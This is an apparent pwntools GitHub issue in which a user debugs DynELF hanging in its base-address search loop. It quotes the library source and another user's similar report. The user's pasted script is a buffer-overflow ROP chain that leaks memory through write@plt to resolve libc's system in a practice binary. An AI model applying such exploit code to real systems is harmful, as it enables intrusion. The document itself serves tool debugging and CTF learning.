pwntools
pwntools copied to clipboard
DynELF cannot break the endless loop in dynelf.py
These are my codes:
from pwn import *
p = process("./pwn1_64")
e = ELF("pwn1_64")
plt_write_addr = e.plt["write"]
start_addr = e.symbols["vulnerable_function"]
pop_rsi_rdx_rdi_addr = 0x40053b
def leak(address):
payload1 = "a"*136
payload1 += p64(pop_rsi_rdx_rdi_addr) + p64(address) + p64(4) + p64(1)
payload1 += p64(plt_write_addr)
payload1 += p64(start_addr)
p.sendline(payload1)
data = p.recv()
return data
dyn_elf = DynELF(leak, elf=e)
system_addr = dyn_elf.lookup("system", "libc")
When I am executing this code,
dyn_elf = DynELF(leak, elf=e)
Program is stuck.
So I try to debug and get into "dynelf.py", discovering that
in class DynELF -> function _find_base ,
def _find_base(self, ptr):
page_size = 0x1000
page_mask = ~(page_size - 1)
ptr &= page_mask
w = None
while True:
if self.leak.compare(ptr, '\x7fELF'):
break
# See if we can short circuit the search
fast = self._find_base_optimized(ptr)
if fast:
ptr = fast
continue
ptr -= page_size
if ptr < 0:
raise ValueError("Address is negative, something is wrong!")
# Defer creating the spinner in the event that 'ptr'
# is already the base address
w = w or self.waitfor("Finding base address")
self.status('%#x' % ptr)
# If we created a spinner, print the success message
if w:
self.success('%#x' % ptr)
return ptr
The condition of breaking the loop has never be met.
I don't know why. But I found something interesting. When I was debugging, once I tried to run my Python script in console code by code. I mean, when one line of code was executed in python interpreter, I input the next line of code to the console and waiting the code to be executed, too.
When I input
dyn_elf = DynELF(leak, elf=e)
It ’s no surprise that the program was stuck.
So, I input the ctrl + c to stop this code.
But when I input the same code to try again, the program didn't stuck at all! But it seems work very bad.
Here is the screeshot.
I don't know why ,too. But I hope this situation can help you. This is my pwn file. pwn1_64.zip I hope it can help you, too!
My English is a little poor, I hope it didn't disturb you.
Similar to the above, I encountered a problem in which the dynelf function could not jump out of the loop and cause a memory leak, resulting in the POC process being killed by the system. My pwntools version is V4.5.0.